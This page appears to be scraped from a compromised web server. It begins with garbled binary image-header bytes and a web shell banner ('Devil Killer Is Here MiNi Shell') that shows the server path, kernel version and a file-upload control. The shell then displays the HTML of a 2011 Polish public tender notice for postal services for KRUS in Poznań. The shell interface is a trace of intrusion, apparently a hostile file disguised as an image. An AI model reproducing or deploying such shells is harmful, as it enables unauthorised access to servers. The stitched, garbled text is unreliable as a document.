JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/388620-N-2011.html

<p class="kh_header"><b>Poznań: Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych w obrocie krajowym i zagranicznym o wadze powyżej 50 gram na rzecz Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu i podległych Placówek Terenowych</b><br>
<b>Numer ogłoszenia: 388620 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu , ul. Św. Marcin 46/50, 60-959 Poznań, woj. wielkopolskie, tel. 061 8530920.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych w obrocie krajowym i zagranicznym o wadze powyżej 50 gram na rzecz Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu i podległych Placówek Terenowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi pocztowe w rozumieniu art. 3  pkt 25) ustawy z dnia 12 czerwca 2003r. - Prawo Pocztowe polegające na  świadczeniu powszechnych usług pocztowych w obrocie krajowym i zagranicznym w zakresie  przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze powyżej 50 gram, przesyłek kurierskich w obrocie krajowym i zagranicznym oraz ewentualnych zwrotów przesyłek przez Operatora Pocztowego ( Wykonawcę)  na rzecz Kasy Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu i podległych Placówek Terenowych wymienionych w załączniku nr 1 do SIWZ.
2.Przez Operatora Pocztowego rozumie się przedsiębiorcę  uprawnionego do wykonywania działalności pocztowej tzn. posiadającego zezwolenie Prezesa Urzędu Komunikacji Elektronicznej  na wykonanie działalności pocztowej w zakresie przyjmowania, przemieszczenia i doręczania przesyłek w obrocie krajowym i zagranicznym 
3.Operator Pocztowy jest zobowiązany świadczyć usługi pocztowe zgodnie z powszechnie obowiązującymi  przepisami prawa, a w szczególności: 
a) Ustawa z dnia 12 czerwca 2003r. - Prawo pocztowe - tekst jednolity ( Dz. U. nr 189 z 2008r. , poz. 1159, z późn. zm.)
b) Rozporządzenie Ministra Infrastruktury z dnia 13 października 2003r. w sprawie reklamacji powszechnej usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego ( Dz. U. nr 183 z 2003r., poz. 1795, z późn. zm. )
c) Rozporządzeniem Ministra Infrastruktury z dnia 09 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych ( Dz.U. nr 5 z 2004r., poz. 34, z późn. zm.) 
d) Regulaminem świadczenia powszechnych usług pocztowych tekst jednolity, wprowadzony Zarządzeniem  nr 157 Dyrektora Generalnego Poczty Polskiej z dnia 28 listopada 2007r. z póz. zm. ( www.poczta-polska.pl)
e) międzynarodowych przepisów pocztowych: ratyfikowana umowa międzynarodowa ogłoszona dnia 8 listopada 2007r. ( Dz.U. nr 206 z 2007r., poz. 1494, Regulamin Poczty Listowej ( Dz.U. nr 108 z 2007r. poz. 744) w przypadku usług pocztowych w obrocie zagranicznym 
f) Cennikiem usług pocztowych w obrocie krajowym i zagranicznym ( wprowadzone w życie na mocy Zarządzeń Dyrektora Generalnego Poczty Polskiej) - obowiązującym w dniu  realizacji usług.
4.Przesyłki będą nadawane przez Zamawiającego przy użyciu maszyn frankujących będących własnością Zamawiającego. W przypadku np. awarii maszyny frankującej lub innej nieprzewidzianej okoliczności, Wykonawca winien dopuścić inny sposób realizacji usługi nadawania przesyłek pocztowych  np. poprzez umieszczanie na kopercie  zapisu dotyczącego opłaty pobranej.
5.Wykonawca  będzie świadczył na rzecz Zamawiającego powszechne usługi pocztowe powyżej 50 gram, paczki i przesyłki kurierskie w obrocie krajowym i zagranicznym w zakresie przyjmowania, przemieszczania i doręczania przesyłek oraz zwracanie przesyłek rejestrowanych do Zamawiającego po wyczerpaniu możliwości ich doręczania lub wydania odbiorcy z podziałem na :
a)  przesyłki listowe rejestrowane w kategorii ekonomicznej i priorytetowej - przysyłki polecone i przesyłki polecone z usługą komplementarną -potwierdzenie odbioru przesyłki rejestrowanej
b) przesyłki listowe nierejestrowane w kategorii ekonomicznej i priorytetowej-przysyłki listowe nadawane i doręczane bez pokwitowania
c) paczki krajowe i zagraniczne - przesyłki rejestrowane zawierające rzeczy
d) przesyłki kurierskie - przesyłki Pocztex w obrocie krajowym i przesyłki EMS w obrocie zagranicznym 
6.Wykaz ilości przewidzianych do wysłania przesyłek zawarto w formularzu ofertowym stanowiącym załącznik nr 2 do SIWZ.  Nadawane ilości poszczególnych przesyłek pocztowych mogą różnić się w stosunku do ilości przesyłek  wskazanych w formularzu ofertowym, z zastrzeżeniem, że kwota za realizację całości  przedmiotu zamówienia nie przekroczy łącznego wynagrodzenia określonego w formularzu ofertowym. 
7.Wykonawca musi posiadać placówki nadawcze w każdej miejscowości,  w której znajdują się jednostki organizacyjne KRUS wymienione w załączniku nr 1 do SIWZ. W związku z powyższym  Wykonawca musi załączyć do oferty załącznik nr 1 do SIWZ zawierający jednostki Zamawiającego uzupełniony o odpowiadające im  jednostki Wykonawcy. 
8.Odbiór (doręczanie) i nadawanie przesyłek pocztowych odbywać się będzie codziennie w dni robocze od poniedziałku do piątku w następujący sposób:
a) przedstawiciele Zamawiającego z jednostek Wykonawcy określonych w załączniku nr 1 do SIWZ będą odbierać przesyłki pocztowe w godzinach 7.00-9.00  lub przedstawiciele Wykonawcy  dostarczą przesyłki pocztowe do siedzib Zamawiającego określonych w załączniku nr 1 do SIWZ w godzinach 7.00 -9.00
b) przedstawiciele Zamawiającego  w jednostkach Wykonawcy określonych w załączniku nr 1 do SIWZ będą nadawać przesyłki pocztowe w godzinach 13.30-15.00 lub przedstawiciele Wykonawcy będą odbierać z siedzib Zamawiającego określonych w załączniku nr 1 do SIWZ przesyłki pocztowe w godzinach 13.30-15.00 
(Uwaga - odbiór przesyłek pocztowych przez przedstawicieli Wykonawcy dotyczy tylko następujących siedzib Zamawiającego - OR KRUS Poznań, PT Konin, Ostrów Wlkp. Pila, Rawicz w przypadku zawarcia umowy na świadczenie usługi poczty firmowej)
9.Przesyłki pocztowe przeznaczone do wysyłki muszą być nadane przez Wykonawcę w dniu ich odbioru od Zamawiającego.
10.Zamawiający będzie korzystał z własnych kopert stanowiących opakowanie przysyłek pocztowych, odpowiednio  zabezpieczonych lub zaklejonych. 
11.Zamawiający zobowiązany będzie do:
a) umieszczania na przesyłce listowej nazwy odbiorcy wraz z jego adresem ( podany jednocześnie w pocztowej książce nadawczej), określając rodzaj przesyłki ( zwykła, polecona, priorytet, zwrotne potwierdzenie odbioru - ZPO) oraz umieszczania przy użyciu maszyny frankującej na stronie adresowej każdej nadawanej przesyłki nadruku ( pieczątki) składającej się pełnej nazwy i adresu Zamawiającego, daty nadania oraz znaku opłaty
b) właściwego przygotowania przesyłek  oraz sporządzania zestawień dla przesyłek
c) nadania przesyłek w stanie uporządkowanym tj. przekazania przesyłek ułożonych stroną adresową w tym samym kierunku, przez co należy rozumieć:
- dla przesyłek rejestrowanych - wpisanie każdej przesyłki do pocztowej książki nadawczej  w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek
- dla przesyłek nierejestrowanych - zestawienie ilościowe przesyłek wg poszczególnych kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej  partii przesyłek  
12.Zlecenie wykonania usługi kurierskiej zgłaszane będzie przez Zamawiającego telefonicznie  pod numerem linii firmowej wskazanej przez Wykonawcę 
13.Zamawiający będzie odpowiedzialny za nadanie przesyłek pocztowych w stanie umożliwiającym Wykonawcy doręczenie bez ubytku lub uszkodzenia do miejsca zgodnie z adresem przeznaczenia. 
14.Wykonawca będzie dostarczał do jednostek Zamawiającego pokwitowane przez adresata  -potwierdzenie odbioru- niezwłocznie pod dokonaniu doręczenia przesyłki, nie później  jednak niż w ciągu 7 dni roboczych od dnia doręczenia.
15.W przypadku nieobecności adresata, przedstawiciel Wykonawcy pozostawia zawiadomienie ( pierwsze awizo) o próbie doręczenia przysyłki ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę pocztową. Termin do odbioru przesyłki przez adresata wynosi 14 dni roboczych liczonych od dnia następnego  po dniu pozostawienia pierwszego awizo, w tym terminie przesyłka jest awizowana dwukrotnie. Po upływie terminu odbioru, przesyłka zwracana jest do odpowiedniej jednostki Zamawiającego wraz z podaniem przyczyny nie odebrania przez adresata.
16.W przypadku nadawania przez Zamawiającego przesyłek nie ujętych w formularzu cenowym podstawą rozliczeń będą ceny z aktualnego cennika usług Wykonawcy, który będzie stanowił załącznik do umowy. 
17.Rozliczenie za wykonane usługi pocztowe będzie mogło odbywać się będzie w formie:
a)zaliczek na poczet opłat za usługi pocztowe (z góry) przelewem na konto wskazane przez Wykonawcę w przypadku zastosowania urządzeń frankujących będących w posiadaniu Zamawiającego. Wysokość zaliczki ustala Zamawiający w zależności od posiadanych środków finansowych. Ustawienie danego licznika urządzenia frankującego będzie dokonywane przez przedstawicieli Wykonawcy w jednostkach Wykonawcy wskazanych w załączniku nr 1 do SIWZ. Ustawienie licznika urządzenia frankującego odpowiednio do wysokości wpłaty następować będzie w dniu dokonania wpłaty tj. w dniu uznania rachunku bankowego  Wykonawcy. Z tytułu wpłat na poczet wykonywania usług Wykonawca  wystawi fakturę VAT nie późnej niż w ciągu 7 dni od daty uznania jego  rachunku bankowego. Faktura VAT winna zawierać zapis wskazujący jednostkę Zamawiającego, której dotyczy zaliczka na poczet opłat za usługi pocztowe. 
b)opłaty za nadawane przesyłki pocztowe (z dołu) będą rozliczane w okresach miesięcznych   na podstawie prawidłowo  wystawionej faktury VAT  w terminie 14 dni  od daty jej wpływy do Zamawiającego na rachunek bankowy Wykonawcy 
18.W przypadku udzielenia przez Wykonawcę upustów za nadawane przesyłki pocztowe rozliczenie pomiędzy zaliczkami na poczet opłat, a należnymi upustami nastąpi w okresach miesięcznych. Szczegółowe warunki udzielania upustów Wykonawca dołączy do oferty lub przedłoży zobowiązanie do przedłożenia warunków udzielania upustów na rok 2012  po ich zatwierdzeniu przez Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca wykaże, że jest operatorem świadczącym usługi pocztowe, o których mowa w ustawie  z dnia 12 czerwca 2003r. - Prawo Pocztowe ( Dz.U.  z 2008.r nr 189, poz.1159 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie. Zamawiający uzna, ze warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie. Zamawiający uzna, ze warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie. Zamawiający uzna, ze warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagania w tym zakresie. Zamawiający uzna, ze warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy  - zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ
2.Oświadczenie o akceptacji i zobowiązanie do zawarcia  umowy  zawierającej istotne postanowienia  określone w pkt XVII SIWZ - oświadczenie zawarte w pkt II.4 formularza ofertowego  stanowiącego załącznik nr 2  do SIWZ   
3.Załączenie do oferty projektu umowy sporządzonego przez Wykonawcę zawierającego istotne postanowienia umowy określone w pkt XVII SIWZ
4.Oświadczenie wskazujące, którą część zamówienia Wykonawca powierzy wykonaniu przez podwykonawców zgodnie z  art. 36 ust. 4 ustawy - Pzp - oświadczenie zawarte w pkt II.7 formularza ofertowego stanowiącego  załącznik nr 2 do SWIZ
5.Załączenie do oferty przez Wykonawcę wykazu jednostek Wykonawcy odpowiadających jednostkom Zamawiającego wymienionym w załączniku nr 1 do SIWZ. 
6.Oświadczenie dotyczące udzielania upustów za nadane przesyłki  listowe zawarte w pkt II.8 formularza ofertowego  stanowiącego załącznik nr 2 do SIWZ.
7.oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza - pełnomocnictwa (upoważnienia) do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile oferta została podpisana przez osoby nie umocowane do tych czynności w dokumentach rejestracyjnych  firmy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 i 2 ustawy - Pzp., zakazuje się istotnych  zmian postanowień zawartej umowy w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy - pod rygorem nieważności wprowadzonych zmian za wyjątkiem zmian dotyczących:
a)wynagrodzenia w zakresie cen jednostkowych za nadane lub zwrócone przesyłki, w przypadku zatwierdzenia nowego cennika usług pocztowych  przez Urząd Komunikacji Elektronicznej w wysokości nie wyższej niż wynikająca  z zatwierdzenia 
b)upustów w czasie trwania umowy
c)zmiany obowiązującej stawki podatku VAT
d)zmiany lokalizacji, ilości, nazwy jednostek Zamawiającego lub Wykonawcy, 
e)zmiany ilości użytkowanych urządzeń frankujących w przypadku ich likwidacji lub zakupu nowego sprzętu, po wcześniejszym uzyskaniu stosowanych pozwoleń i rejestracji przez Wykonawcę
f)oraz  wystąpienia okoliczności niezależnych od Stron umowy powodujących  konieczność  wprowadzenia zmian  do przedmiotu umowy, Strony negocjują zmiany w umowie niezbędne dla prawidłowej realizacji przedmiotu umowy.
2. W przypadku konieczności wprowadzenia zmian do umowy na skutek okoliczności, o których mowa w pkt 1, Zamawiający albo Wykonawca, który poweźmie o nich wiadomości zobowiązany jest niezwłocznie poinformować o tym pisemnie drugą stronę umowy wraz z udokumentowaniem zaistnienia okoliczności wpływających na konieczności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
